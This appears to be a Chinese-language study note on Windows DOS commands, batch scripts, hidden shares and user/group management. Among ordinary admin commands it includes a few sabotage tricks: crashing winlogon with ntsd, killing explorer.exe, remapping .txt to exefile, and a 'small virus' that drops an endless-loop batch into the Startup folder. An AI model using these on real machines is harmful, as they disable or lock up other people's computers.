1,DOS
dir /a 查看磁盘内容
type filename 浏览文件内容
type filename | more 分页显示(空格翻页)
fsutil file createnew c:\system.ini 40860000
快速生成空白文件,
assoc .txt=exefile 修改关联性
copy con 文件名.扩展名
开始编辑内容
ctrl+z回车结束编写
shutdown -s -t 100 ( 100秒后关机)
shutdown -r -t 100 (100秒后重启)
shutdown -s -f -t 100 (强制)
shutdown -s -f -t 100 -c “结束”
shutdown -l (注销
解除:
shutdown -a 取消一切定时
whoami \user
2,批处理
就是dos脚本,这里只列几个例子
案例:
下面展示一些 内联代码片
。
@echo off
title 小程序v1.0
color 0a
:menu
cls
echo ==========
echo 菜单
echo 1:定时关机
echo 2:取消定时
echo 3:退出
echo==========
set /p tmp=您的选择是
if "%tmp%"=="1" goto 1
if "%tmp%"=="2" goto 2
if "%tmp%"=="3" goto 3
echo 别tm瞎输入
pause
goto menu
:1
set /p a=请输入时间(单位/秒)
shutdown -s -f -t %a%
goto menu
:2
shutdown -a
goto menu
:3
exit
针对win2003(蓝屏dos)
ntsd -c q -pn winlogon.exe
针对2003或xp(杀死桌面程序)
@echo off
taskkill /im explorer.exe /f >nul 2>nul
小病毒:(xp系统)
cd "%userprofile%\「开始」菜单\程序\启动"
echo :1 >sys.bat
echo start >>sys.bat
echo goto 1 >>sys.bat
3,文件共享
端口445,可以在防火墙的高级设置里,入站规则那边关掉445端口。
共享状态查看:
net share
C$ (隐藏共享)
D$
IPC$ (空链接 权限很高)
文件共享一般和FTPS权限相互结合使用,具体实现用的时候建议百度,比较细节。
4,组与用户管理
给出一个bat脚本,里面含有用户的创建,提权,删除等等操作。
@echo off
:menu
cls
echo================
echo 菜单
echo 1:创建用户
echo 2:删除用户
echo 3:修改用户所在组
echo 4:退出
echo================
set /p number=请输入选择
if "%number%"=="1" goto 1
if "%number%"=="2" goto 2
if "%number%"=="3" goto 3
if "%number%"=="4" goto 4
echo wrong input
pause
goto menu
:1
set /p name1=请输入用户名
net user %name1% /add >nul 2>nul
echo 创建用户%name1%成功
pause
goto menu
:2
set /p name2=请输入用户名
net user %name2% /del
echo 删除用户%name2%成功 >nul 2>nul
pause
goto menu
:3
echo 已有用户如下
net user
echo 已有组如下
net localgroup
set /p name3=请输入用户名
set /p group=请输入想要将此用户放入的组
net localgroup %group% %user% /add >nul 2>nul
echo 移动用户%name3%成功
pause
goto menu
:4
exit